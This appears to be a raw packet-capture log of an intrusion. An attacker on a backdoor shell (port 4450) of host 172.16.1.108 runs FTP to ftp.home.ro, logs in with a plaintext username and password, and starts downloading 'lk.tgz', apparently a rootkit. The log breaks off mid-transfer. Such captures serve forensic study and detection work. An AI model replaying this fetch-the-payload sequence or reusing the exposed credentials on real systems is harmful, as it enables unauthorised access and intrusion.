=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:07.684863 193.231.236.41:1519 -> 172.16.1.108:113 TCP TTL:34 TOS:0x0 ID:42372 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x9AEAA249 Ack: 0x90385297 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 14797767 2967128 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:07.694762 193.231.236.41:1522 -> 172.16.1.108:113 TCP TTL:34 TOS:0x0 ID:42373 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x9A7C6792 Ack: 0x906C3BFE Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 14797769 2967130 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:07.696224 193.231.236.41:1522 -> 172.16.1.108:113 TCP TTL:34 TOS:0x0 ID:42374 IpLen:20 DgmLen:62 DF ***AP*** Seq: 0x9A7C6792 Ack: 0x906C3BFE Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 14797769 2967130 31 30 32 36 2C 20 32 31 0D 0A 1026, 21.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:07.697445 172.16.1.108:113 -> 193.231.236.41:1522 TCP TTL:63 TOS:0x0 ID:95 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x906C3BFE Ack: 0x9A7C679C Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2967150 14797769 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:07.698299 172.16.1.108:113 -> 193.231.236.41:1522 TCP TTL:63 TOS:0x0 ID:96 IpLen:20 DgmLen:86 DF ***AP*** Seq: 0x906C3BFE Ack: 0x9A7C679C Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2967150 14797769 31 30 32 36 20 2C 20 32 31 20 3A 20 55 53 45 52 1026 , 21 : USER 49 44 20 3A 20 4F 54 48 45 52 20 3A 72 6F 6F 74 ID : OTHER :root 0D 0A .. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:07.898134 193.231.236.41:1522 -> 172.16.1.108:113 TCP TTL:34 TOS:0x0 ID:42416 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x9A7C679C Ack: 0x906C3C20 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 14797787 2967150 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:07.899619 193.231.236.41:1522 -> 172.16.1.108:113 TCP TTL:34 TOS:0x0 ID:42417 IpLen:20 DgmLen:52 DF ***A***F Seq: 0x9A7C679C Ack: 0x906C3C20 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 14797788 2967150 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:07.900798 172.16.1.108:113 -> 193.231.236.41:1522 TCP TTL:63 TOS:0x0 ID:97 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x906C3C20 Ack: 0x9A7C679D Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2967170 14797788 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:07.901169 172.16.1.108:113 -> 193.231.236.41:1522 TCP TTL:63 TOS:0x0 ID:98 IpLen:20 DgmLen:52 DF ***A***F Seq: 0x906C3C20 Ack: 0x9A7C679D Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2967170 14797788 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:07.902148 193.231.236.41:21 -> 172.16.1.108:1026 TCP TTL:34 TOS:0x0 ID:42424 IpLen:20 DgmLen:58 DF ***AP*** Seq: 0x99F959F9 Ack: 0x903AE7E4 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 14797788 2966869 32 32 30 2D 0D 0A 220-.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:07.903743 172.16.1.108:1026 -> 193.231.236.41:21 TCP TTL:63 TOS:0x10 ID:99 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x903AE7E4 Ack: 0x99F959FF Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2967170 14797788 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:07.903756 172.16.1.108:39168 -> 211.185.125.124:4450 TCP TTL:63 TOS:0x0 ID:100 IpLen:20 DgmLen:83 DF ***AP*** Seq: 0x5960638E Ack: 0x9C6D2C26 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2967170 23766667 43 6F 6E 6E 65 63 74 65 64 20 74 6F 20 66 74 70 Connected to ftp 2E 68 6F 6D 65 2E 72 6F 2E 0A 32 32 30 2D 0A .home.ro..220-. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:07.904047 193.231.236.41:21 -> 172.16.1.108:1026 TCP TTL:34 TOS:0x0 ID:42425 IpLen:20 DgmLen:58 DF ***AP*** Seq: 0x99F959FF Ack: 0x903AE7E4 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 14797788 2966869 32 32 30 2D 0D 0A 220-.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:07.905797 172.16.1.108:1026 -> 193.231.236.41:21 TCP TTL:63 TOS:0x10 ID:101 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x903AE7E4 Ack: 0x99F95A05 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2967171 14797788 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:08.101370 193.231.236.41:1522 -> 172.16.1.108:113 TCP TTL:34 TOS:0x0 ID:42499 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x9A7C679D Ack: 0x906C3C21 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 14797809 2967170 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:08.137352 193.231.236.41:21 -> 172.16.1.108:1026 TCP TTL:34 TOS:0x0 ID:42502 IpLen:20 DgmLen:374 DF ***AP*** Seq: 0x99F95A05 Ack: 0x903AE7E4 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 14797809 2967170 32 32 30 2D 20 20 20 20 20 20 20 20 20 20 20 20 220- 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 48 H 20 4F 20 4D 20 45 20 20 2E 20 20 52 20 20 4F 0D O M E . R O. 0A 32 32 30 2D 0D 0A 32 32 30 2D 20 20 20 20 20 .220-..220- 20 20 20 20 20 20 20 20 20 20 20 20 54 68 69 73 This 20 73 65 72 76 65 72 20 69 73 20 66 6F 72 20 48 server is for H 4F 4D 45 2E 52 4F 20 6D 65 6D 62 65 72 73 20 6F OME.RO members o 6E 6C 79 2E 0D 0A 32 32 30 2D 20 20 20 20 20 20 nly...220- 20 20 20 20 20 20 20 20 20 20 20 20 47 6F 20 74 Go t 6F 20 68 74 74 70 3A 2F 2F 77 77 77 2E 68 6F 6D o http://www.hom 65 2E 72 6F 2F 20 74 6F 20 72 65 67 69 73 74 65 e.ro/ to registe 72 2E 0D 0A 32 32 30 2D 0D 0A 32 32 30 2D 20 20 r...220-..220- 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 4E 6F 20 61 6E 6F 6E 79 6D 6F 75 73 No anonymous 20 61 63 63 65 73 73 20 61 6C 6C 6F 77 65 64 2E access allowed. 0D 0A 32 32 30 2D 0D 0A 32 32 30 2D 0D 0A 32 32 ..220-..220-..22 30 20 50 72 6F 46 54 50 44 20 31 2E 32 2E 30 72 0 ProFTPD 1.2.0r 63 33 20 53 65 72 76 65 72 20 28 48 4F 4D 45 2E c3 Server (HOME. 52 4F 20 4D 65 6D 62 65 72 73 20 46 54 50 29 20 RO Members FTP) 5B 31 39 33 2E 32 33 31 2E 32 33 36 2E 34 31 5D [193.231.236.41] 0D 0A .. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:08.156087 172.16.1.108:1026 -> 193.231.236.41:21 TCP TTL:63 TOS:0x10 ID:102 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x903AE7E4 Ack: 0x99F95B47 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2967196 14797809 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:08.158017 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:28216 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x9C6D2C26 Ack: 0x596063AD Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23767040 2967170 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:08.159828 172.16.1.108:39168 -> 211.185.125.124:4450 TCP TTL:63 TOS:0x0 ID:103 IpLen:20 DgmLen:370 DF ***AP*** Seq: 0x596063AD Ack: 0x9C6D2C26 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2967196 23767040 32 32 30 2D 0A 32 32 30 2D 20 20 20 20 20 20 20 220-.220- 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 48 20 4F 20 4D 20 45 20 20 2E 20 20 H O M E . 52 20 20 4F 0A 32 32 30 2D 0A 32 32 30 2D 20 20 R O.220-.220- 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 54 T 68 69 73 20 73 65 72 76 65 72 20 69 73 20 66 6F his server is fo 72 20 48 4F 4D 45 2E 52 4F 20 6D 65 6D 62 65 72 r HOME.RO member 73 20 6F 6E 6C 79 2E 0A 32 32 30 2D 20 20 20 20 s only..220- 20 20 20 20 20 20 20 20 20 20 20 20 20 20 47 6F Go 20 74 6F 20 68 74 74 70 3A 2F 2F 77 77 77 2E 68 to http://www.h 6F 6D 65 2E 72 6F 2F 20 74 6F 20 72 65 67 69 73 ome.ro/ to regis 74 65 72 2E 0A 32 32 30 2D 0A 32 32 30 2D 20 20 ter..220-.220- 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 4E 6F 20 61 6E 6F 6E 79 6D 6F 75 73 No anonymous 20 61 63 63 65 73 73 20 61 6C 6C 6F 77 65 64 2E access allowed. 0A 32 32 30 2D 0A 32 32 30 2D 0A 32 32 30 20 50 .220-.220-.220 P 72 6F 46 54 50 44 20 31 2E 32 2E 30 72 63 33 20 roFTPD 1.2.0rc3 53 65 72 76 65 72 20 28 48 4F 4D 45 2E 52 4F 20 Server (HOME.RO 4D 65 6D 62 65 72 73 20 46 54 50 29 20 5B 31 39 Members FTP) [19 33 2E 32 33 31 2E 32 33 36 2E 34 31 5D 0A 3.231.236.41]. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:08.457516 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:28239 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x9C6D2C26 Ack: 0x596064EB Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23767068 2967196 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:12.098000 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:30922 IpLen:20 DgmLen:58 DF ***AP*** Seq: 0x9C6D2C26 Ack: 0x596064EB Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23767434 2967196 73 6F 61 6E 65 0A soane. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:12.099614 172.16.1.108:1026 -> 193.231.236.41:21 TCP TTL:63 TOS:0x10 ID:104 IpLen:20 DgmLen:64 DF ***AP*** Seq: 0x903AE7E4 Ack: 0x99F95B47 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2967590 14797809 55 53 45 52 20 73 6F 61 6E 65 0D 0A USER soane.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:12.115897 172.16.1.108:39168 -> 211.185.125.124:4450 TCP TTL:63 TOS:0x0 ID:105 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x596064EB Ack: 0x9C6D2C2C Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2967592 23767434 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:12.309511 193.231.236.41:21 -> 172.16.1.108:1026 TCP TTL:34 TOS:0x0 ID:43144 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x99F95B47 Ack: 0x903AE7F0 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 14798229 2967590 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:12.317155 193.231.236.41:21 -> 172.16.1.108:1026 TCP TTL:34 TOS:0x0 ID:43149 IpLen:20 DgmLen:86 DF ***AP*** Seq: 0x99F95B47 Ack: 0x903AE7F0 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 14798230 2967590 33 33 31 20 50 61 73 73 77 6F 72 64 20 72 65 71 331 Password req 75 69 72 65 64 20 66 6F 72 20 73 6F 61 6E 65 2E uired for soane. 0D 0A .. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:12.318567 172.16.1.108:39168 -> 211.185.125.124:4450 TCP TTL:63 TOS:0x0 ID:106 IpLen:20 DgmLen:110 DF ***AP*** Seq: 0x596064EB Ack: 0x9C6D2C2C Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2967612 23767434 4E 61 6D 65 20 28 66 74 70 2E 68 6F 6D 65 2E 72 Name (ftp.home.r 6F 3A 72 6F 6F 74 29 3A 20 33 33 31 20 50 61 73 o:root): 331 Pas 73 77 6F 72 64 20 72 65 71 75 69 72 65 64 20 66 sword required f 6F 72 20 73 6F 61 6E 65 2E 0A or soane.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:12.336020 172.16.1.108:1026 -> 193.231.236.41:21 TCP TTL:63 TOS:0x10 ID:107 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x903AE7F0 Ack: 0x99F95B69 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2967614 14798230 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:12.587696 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:30969 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x9C6D2C2C Ack: 0x59606525 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23767481 2967612 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:12.588898 172.16.1.108:39168 -> 211.185.125.124:4450 TCP TTL:63 TOS:0x0 ID:108 IpLen:20 DgmLen:61 DF ***AP*** Seq: 0x59606525 Ack: 0x9C6D2C2C Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2967639 23767481 50 61 73 73 77 6F 72 64 3A Password: =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:13.426076 172.16.1.108:39168 -> 211.185.125.124:4450 TCP TTL:63 TOS:0x0 ID:109 IpLen:20 DgmLen:61 DF ***AP*** Seq: 0x59606525 Ack: 0x9C6D2C2C Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2967723 23767481 50 61 73 73 77 6F 72 64 3A Password: =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:15.106117 172.16.1.108:39168 -> 211.185.125.124:4450 TCP TTL:63 TOS:0x0 ID:110 IpLen:20 DgmLen:61 DF ***AP*** Seq: 0x59606525 Ack: 0x9C6D2C2C Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2967891 23767481 50 61 73 73 77 6F 72 64 3A Password: =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:15.354946 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:33437 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x9C6D2C2C Ack: 0x5960652E Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23767757 2967891 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:16.746468 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:35412 IpLen:20 DgmLen:62 DF ***AP*** Seq: 0x9C6D2C2C Ack: 0x5960652E Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23767896 2967891 69 32 74 74 67 63 6A 31 64 0A i2ttgcj1d. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:16.747962 172.16.1.108:1026 -> 193.231.236.41:21 TCP TTL:63 TOS:0x10 ID:111 IpLen:20 DgmLen:68 DF ***AP*** Seq: 0x903AE7F0 Ack: 0x99F95B69 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2968055 14798230 50 41 53 53 20 69 32 74 74 67 63 6A 31 64 0D 0A PASS i2ttgcj1d.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:16.766060 172.16.1.108:39168 -> 211.185.125.124:4450 TCP TTL:63 TOS:0x0 ID:112 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x5960652E Ack: 0x9C6D2C36 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2968057 23767896 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:16.955920 193.231.236.41:21 -> 172.16.1.108:1026 TCP TTL:34 TOS:0x0 ID:44014 IpLen:20 DgmLen:79 DF ***AP*** Seq: 0x99F95B69 Ack: 0x903AE800 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 14798694 2968055 32 33 30 20 55 73 65 72 20 73 6F 61 6E 65 20 6C 230 User soane l 6F 67 67 65 64 20 69 6E 2E 0D 0A ogged in... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:16.957281 172.16.1.108:39168 -> 211.185.125.124:4450 TCP TTL:63 TOS:0x0 ID:113 IpLen:20 DgmLen:78 DF ***AP*** Seq: 0x5960652E Ack: 0x9C6D2C36 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2968076 23767896 32 33 30 20 55 73 65 72 20 73 6F 61 6E 65 20 6C 230 User soane l 6F 67 67 65 64 20 69 6E 2E 0A ogged in.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:16.957693 172.16.1.108:1026 -> 193.231.236.41:21 TCP TTL:63 TOS:0x10 ID:114 IpLen:20 DgmLen:58 DF ***AP*** Seq: 0x903AE800 Ack: 0x99F95B84 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2968076 14798694 53 59 53 54 0D 0A SYST.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:17.175043 193.231.236.41:21 -> 172.16.1.108:1026 TCP TTL:34 TOS:0x0 ID:44075 IpLen:20 DgmLen:71 DF ***AP*** Seq: 0x99F95B84 Ack: 0x903AE806 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 14798715 2968076 32 31 35 20 55 4E 49 58 20 54 79 70 65 3A 20 4C 215 UNIX Type: L 38 0D 0A 8.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:17.196183 172.16.1.108:1026 -> 193.231.236.41:21 TCP TTL:63 TOS:0x10 ID:115 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x903AE806 Ack: 0x99F95B97 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2968100 14798715 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:17.205847 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:35415 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x9C6D2C36 Ack: 0x59606548 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23767945 2968076 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:20.815859 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:38073 IpLen:20 DgmLen:63 DF ***AP*** Seq: 0x9C6D2C36 Ack: 0x59606548 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23768305 2968076 67 65 74 20 6C 6B 2E 74 67 7A 0A get lk.tgz. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:20.817660 172.16.1.108:1026 -> 193.231.236.41:21 TCP TTL:63 TOS:0x10 ID:116 IpLen:20 DgmLen:60 DF ***AP*** Seq: 0x903AE806 Ack: 0x99F95B97 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2968462 14798715 54 59 50 45 20 49 0D 0A TYPE I.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:20.836306 172.16.1.108:39168 -> 211.185.125.124:4450 TCP TTL:63 TOS:0x0 ID:117 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x59606548 Ack: 0x9C6D2C41 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2968464 23768305 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:21.035345 193.231.236.41:21 -> 172.16.1.108:1026 TCP TTL:34 TOS:0x0 ID:45174 IpLen:20 DgmLen:72 DF ***AP*** Seq: 0x99F95B97 Ack: 0x903AE80E Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 14799101 2968462 32 30 30 20 54 79 70 65 20 73 65 74 20 74 6F 20 200 Type set to 49 2E 0D 0A I... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:21.037327 172.16.1.108:1026 -> 193.231.236.41:21 TCP TTL:63 TOS:0x10 ID:118 IpLen:20 DgmLen:75 DF ***AP*** Seq: 0x903AE80E Ack: 0x99F95BAB Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2968484 14799101 50 4F 52 54 20 31 37 32 2C 31 36 2C 31 2C 31 30 PORT 172,16,1,10 38 2C 34 2C 33 0D 0A 8,4,3.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:21.234833 193.231.236.41:21 -> 172.16.1.108:1026 TCP TTL:34 TOS:0x0 ID:45241 IpLen:20 DgmLen:82 DF ***AP*** Seq: 0x99F95BAB Ack: 0x903AE825 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 14799122 2968484 32 30 30 20 50 4F 52 54 20 63 6F 6D 6D 61 6E 64 200 PORT command 20 73 75 63 63 65 73 73 66 75 6C 2E 0D 0A successful... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:21.236721 172.16.1.108:39168 -> 211.185.125.124:4450 TCP TTL:63 TOS:0x0 ID:119 IpLen:20 DgmLen:175 DF ***AP*** Seq: 0x59606548 Ack: 0x9C6D2C41 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2968503 23768305 52 65 6D 6F 74 65 20 73 79 73 74 65 6D 20 74 79 Remote system ty 70 65 20 69 73 20 55 4E 49 58 2E 0A 55 73 69 6E pe is UNIX..Usin 67 20 62 69 6E 61 72 79 20 6D 6F 64 65 20 74 6F g binary mode to 20 74 72 61 6E 73 66 65 72 20 66 69 6C 65 73 2E transfer files. 0A 6C 6F 63 61 6C 3A 20 6C 6B 2E 74 67 7A 20 72 .local: lk.tgz r 65 6D 6F 74 65 3A 20 6C 6B 2E 74 67 7A 0A 32 30 emote: lk.tgz.20 30 20 50 4F 52 54 20 63 6F 6D 6D 61 6E 64 20 73 0 PORT command s 75 63 63 65 73 73 66 75 6C 2E 0A uccessful.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:21.236736 172.16.1.108:1026 -> 193.231.236.41:21 TCP TTL:63 TOS:0x10 ID:120 IpLen:20 DgmLen:65 DF ***AP*** Seq: 0x903AE825 Ack: 0x99F95BC9 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2968504 14799122 52 45 54 52 20 6C 6B 2E 74 67 7A 0D 0A RETR lk.tgz.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:21.465945 193.231.236.41:21 -> 172.16.1.108:1026 TCP TTL:34 TOS:0x0 ID:45312 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x99F95BC9 Ack: 0x903AE832 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 14799146 2968504 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:21.518479 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:38120 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x9C6D2C41 Ack: 0x596065C3 Win: 0x7D78 